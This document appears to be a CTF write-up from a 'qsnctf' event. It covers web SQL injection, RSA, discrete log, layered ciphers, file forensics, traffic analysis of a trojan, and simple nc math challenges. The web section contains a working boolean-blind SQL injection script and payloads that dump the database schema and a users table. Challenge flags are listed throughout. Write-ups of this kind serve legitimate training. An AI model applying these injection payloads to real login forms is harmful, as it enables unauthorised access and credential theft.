WEB

PHP backdoor

The backdoor vulnerability in the php-8.1.0 version.

Just set it with HackBar.

EasyMD5

Opening the challenge shows two file-upload fields.

You need to upload PDF files: the two PDFs must be different but have the same MD5 value.

Generate them with fastcoll:

.\fastcoll_v1.0.0.5.exe -p C:\Users\Eileeny\Desktop\1.pdf -o C:\Users\Eileeny\Desktop\1.pdf C:\Users\Eileeny\Desktop\2.pdf

EasySQLi

POST-based boolean blind injection.

Run it with a Python script:

import requests

# Target URL
url = "http://challenge.qsnctf.com:30180/login.php"

# Payload for determining the length
payload_len = """a' or length(
                    (database())
                )>{n} #"""

# Payload for enumerating characters
payload_str = """a' or ascii(
                    substr(
                        (select database())
                    ,{l},1)
                )={n} #"""

# POST request parameters
data = {
    "uname": "",
    "psw": "1"
}

# Determine the length
def getLen(payload_len):
    length = 1
    while True:

        # Modify the request parameters
        data["uname"] = payload_len.format(n=length)
        response = requests.post(url, data=data)
        print(response.text)

        # This text appears when the login succeeds, i.e. the condition was true
        if 'Login successful' in response.text:
            print('Testing length:', length)
            length += 1
        else:
            print('Test finished, length is:', length)
            return length

# Enumerate the characters
def getStr(length):
    result = ''

    # Take the characters one at a time, starting from the first
    for l in range(1, length + 1):

        # Try every printable ASCII value (32..126) for this position
        for n in range(32, 127):
            data["uname"] = payload_str.format(l=l, n=n)
            response = requests.post(url=url, data=data)
            if 'Login successful' in response.text:
                result += chr(n)
                print('Character', l, 'found:', result)
                break
    return result

length = getLen(payload_len)
getStr(length)

1' or (select count(schema_name) from information_schema.schemata)=5#

Brute-forcing manually shows there are 5 databases.

Database name: qsnctf

a' or (select count(table_name) from information_schema.tables where table_schema='qsnctf')=1 #

The number of tables is 1.

Guess the length of the table name in the specified database:

a' or length((select table_name from information_schema.tables where table_schema='qsnctf' limit 0,1))

Guess the table name in the specified database:

a' or ascii(substr((select table_name from information_schema.tables where table_schema='qsnctf' limit 0,1),{l},1))

The table is users.

Guess the number of columns in the specified table:

a' or (select count(column_name) from information_schema.columns where table_schema='qsnctf' and table_name='users')

Three columns.

Guess the length of a given column name in the specified table:

a' or length((select column_name from information_schema.columns where table_schema='qsnctf' and table_name='users' limit 0,1))

Guess the column names of the specified table:

a' or ascii(substr((select column_name from information_schema.columns where table_schema='qsnctf' and table_name='users' limit 0,1),{l},1)) #

They are id, username and password.

Guess the number of rows in the specified column:

a' or (select count(id) from users)

Guess the length of a value in the specified column:

a' or length((select id from users limit 0,1))

Guess the content of the specified column:

a' or ascii(substr((select id from users limit 0,1),{l},1))

The id column has two values: 1 and 2.

The username column has two values: admin and user.

The password column has two values: 123456 and qsnctf{c01dbd144570443283501810fd592a07}

CRYPTO

Solve an equation

flag:qsnctf{8e5d8c07a0c14b0e9fa03c19df7e8728}

RSA: given p, q and e, find d

import gmpy2

p = 159321896677619447938612410213707703277
q = 233919644265895034751157128177026418817
e = 65537

# Euler's totient of n = p*q; d is the modular inverse of e modulo phi(n)
phi_n = (p - 1) * (q - 1)
print(gmpy2.invert(e, phi_n))

Submitting d gives the flag.
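An added check (not part of the original writeup) that computes d with the standard library alone, confirms it is the inverse of e modulo phi(n), and shows that the exponent derived from lcm(p-1, q-1) decrypts just as well; p, q and e are the challenge values above, the test message is constructed.

```python
from math import gcd

# Challenge values from the writeup above
p = 159321896677619447938612410213707703277
q = 233919644265895034751157128177026418817
e = 65537
n = p * q

def private_exponent(p, q, e):
    """d = e^-1 mod phi(n), the same value gmpy2.invert(e, phi_n) returns."""
    phi_n = (p - 1) * (q - 1)
    if gcd(e, phi_n) != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    return pow(e, -1, phi_n)  # Python 3.8+ modular inverse

def private_exponent_lcm(p, q, e):
    """Alternative d using lambda(n) = lcm(p-1, q-1) (Carmichael function),
    the definition RFC 8017 (PKCS #1) uses; it is never larger than the
    phi(n)-based d and decrypts identically."""
    lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)
    return pow(e, -1, lam)

def roundtrip(m, d):
    """Encrypt with the public key, decrypt with d; True if m is recovered."""
    c = pow(m, e, n)
    return pow(c, d, n) == m

if __name__ == "__main__":
    d = private_exponent(p, q, e)
    print("d =", d)
    print("e*d mod phi(n) =", (e * d) % ((p - 1) * (q - 1)))
    print("round trip ok:", roundtrip(123456789, d))
```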

ez_log

flag:qsnctf{7a1a12a521034588ad0485f56df6c271}

A discrete logarithm problem; solve it with Sage:

# Run inside SageMath: Zmod and .log() are Sage, not plain Python
n = 3006156660704242356836102321001016782090189571028526298055526061772989406357037170723984497344618257575827271367883545096587962708266010793826346841303043716776726799898939374985320242033037
m = 3
c = 2942499086260575007456275705950978423224027906664535985972351196799739998071558270252547028321035227353504158940484860266945926967328136766272091300445921634497414856123032466570637049683198
ZmodN = Zmod(n)

# Lift the base and the ciphertext into Z/nZ, then solve c = m^key for key
m = ZmodN(m)
c = ZmodN(c)

print(c.log(m))

Submitting the key gives the flag.

Quadruple encryption

flag:qsnctf{ldvgosdabv_kfkjc_jcvsbdi}

Layer 1: base32; the archive password is qsnctf

Layer 2: HTML entities, giving zcye{mxmemtxrzt_lzbha_kwmqzec}|key=hello

Layer 3: Vigenère, giving synt{yqitbfqnoi_xsxwp_wpifoqv}

Layer 4: ROT13, giving flag{ldvgosdabv_kfkjc_jcvsbdi}
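An added example (not from the original writeup) that peels the last two layers above in code: it splits the layer-2 output into ciphertext and key, applies the Vigenère convention in which only letters are shifted and the key advances only on letters, then applies ROT13. The intermediate strings are the ones quoted above.

```python
import codecs

# Intermediate strings from the four-layer challenge above
LAYER2_OUTPUT = "zcye{mxmemtxrzt_lzbha_kwmqzec}|key=hello"
LAYER3_OUTPUT = "synt{yqitbfqnoi_xsxwp_wpifoqv}"
LAYER4_OUTPUT = "flag{ldvgosdabv_kfkjc_jcvsbdi}"

def vigenere_decrypt(ciphertext, key):
    """Classic Vigenère: only letters are shifted, and the key index advances
    only on letters, so braces and underscores pass through untouched."""
    out = []
    k = 0
    key = key.lower()
    for ch in ciphertext:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[k % len(key)]) - ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)

def peel_last_two_layers(layer2_output):
    """Split the 'ciphertext|key=...' form, undo Vigenère, then ROT13.
    Returns (layer-3 text, layer-4 text)."""
    ciphertext, _, key_part = layer2_output.partition("|")
    key = key_part.split("=", 1)[1]
    vig = vigenere_decrypt(ciphertext, key)
    return vig, codecs.decode(vig, "rot_13")

if __name__ == "__main__":
    layer3, layer4 = peel_last_two_layers(LAYER2_OUTPUT)
    print(layer3)
    print(layer4)
```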

MISC

CTFer revenge

flag:qsnctf{b414e3e3a6449ddba0997db259203eb7}

We are given a txt file that turns out to be a reversed hex dump; this script reverses it back:

def extract_specific_range(file_path, output_file_path):
    extracted_data = []
    with open(file_path, 'r', encoding='utf-8') as file:
        for line in file:
            # Keep only the hex-byte columns of each dump line (offset 20..66 in this
            # file's layout); shorter lines are taken to the end
            if len(line) > 66:
                extracted_data.append(line[20:67])
            else:
                extracted_data.append(line[20:])
    # Join the hex, drop the spaces, and reverse the whole string
    text = ''.join(extracted_data).replace(' ', '')
    reversed_text = text[::-1]
    with open(output_file_path, 'w', encoding='utf-8') as output_file:
        output_file.write(reversed_text)

file_path = "D:\\桌面\\是什么呢(仔细观察).txt"
output_file_path = "D:\\桌面\\output.txt"
extract_specific_range(file_path, output_file_path)

This yields an encrypted archive; brute-forcing the password gives z12345, and extracting it gives the flag image.

多情 (Sentimental)

flag:qsnctf{Lrp5mJcdEbbv2bnf6HQSNh}

A PNG and a txt file of HTML-encoded text. The PNG contains a nested PNG; extract it and brute-force its width and height to get the number 996. Combining this with the n-th 1 and 0 in the txt file name, convert 996 to binary, 111100100, convert the corresponding HTML to ASCII, and finally wrap the result in qsnctf{} to get the flag.

Xiaoguang's Book of Answers

flag:qsnctf{49e7bd5efe114cd2d93ef60ddb2f8714}

Templar cipher; decoding gives life. Follow the official account and reply with that keyword.

ez_model

flag:qsnctf{d0b1e37104739d71b92fb1a93aa8cf09}

A .pth file; looking it up shows it is PyTorch. Inspect the model:

import torch

# torch.load unpickles the file, so a .pth from an untrusted source can run
# code when loaded; inspect it in an isolated environment
model = torch.load("D:\\桌面\\easy.pth")
print(model)

This gives the flag and a hint:

Flag: LidUJ3fQM2FVJoxpDwLvDyF3DwpPdwxOEgbQJoxnEgdnJgnojoZ5mF
Hint: ZzYyXxAaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWw0123456789+/

This is base64 with a custom alphabet: the hint is the alphabet and the flag is the encoded text.

Decoding gives the flag.
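An added example (not from the original writeup) showing how a substituted base64 alphabet is decoded: each custom symbol is mapped back to the standard symbol at the same index, the padding the challenge output omits is restored, and the standard decoder does the rest. The alphabet and the encoded string are the Hint and Flag values above.

```python
import base64

# Custom alphabet (the Hint) and encoded text (the Flag) from the challenge above
CUSTOM_ALPHABET = "ZzYyXxAaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWw0123456789+/"
STANDARD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
ENCODED_FLAG = "LidUJ3fQM2FVJoxpDwLvDyF3DwpPdwxOEgbQJoxnEgdnJgnojoZ5mF"

def decode_custom_base64(data, alphabet):
    """Decode base64 produced with a substituted 64-character alphabet.

    The custom symbol at index i stands for the standard symbol at index i, so
    a character translation turns the text back into ordinary base64. The '='
    padding that the challenge output drops (54 chars, not a multiple of 4) is
    restored before decoding, otherwise b64decode rejects the input."""
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must contain 64 distinct characters")
    table = str.maketrans(alphabet, STANDARD_ALPHABET)
    standard = data.translate(table)
    standard += "=" * (-len(standard) % 4)
    return base64.b64decode(standard, validate=True)

def encode_custom_base64(raw, alphabet):
    """Inverse operation: standard base64, then map each symbol to the custom one."""
    table = str.maketrans(STANDARD_ALPHABET, alphabet)
    return base64.b64encode(raw).decode().translate(table)

if __name__ == "__main__":
    print(decode_custom_base64(ENCODED_FLAG, CUSTOM_ALPHABET).decode())
```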

REVERSE

Let's play CS

flag:qsnctf{10.0.80.253:8118}

The antivirus reports a backdoor trojan; judging from the flag format the challenge asks for, the goal is to find the remote IP the program connects to.

IDA analysis got nowhere, so capture the traffic with Wireshark instead.

After starting the exe, the IP and port show up, giving the flag.

PWN

Simple math problem

Connect with nc and answer three math questions:

nc challenge.qsnctf.com 30817
[*]Welcome! Please solve an equation.
[*]Challenge 1: 2*15^2-1/x+15-6=458.875 Please tell me the result of x.
8
[*]True! This problem is very simple! Right?!

[*]Challenge 2: 5+sqrt(x)=8 Please tell me the result of x.
[*]Hint: Sqrt means radical sign.
9
[*]True! This problem is very simple! Right?!

[*]Challenge 3: x^10+2^10-4*x=6131066258749 Please tell me the result of x.
19
[*]True! This problem is very simple! Right?!

[*]Here you go, flag.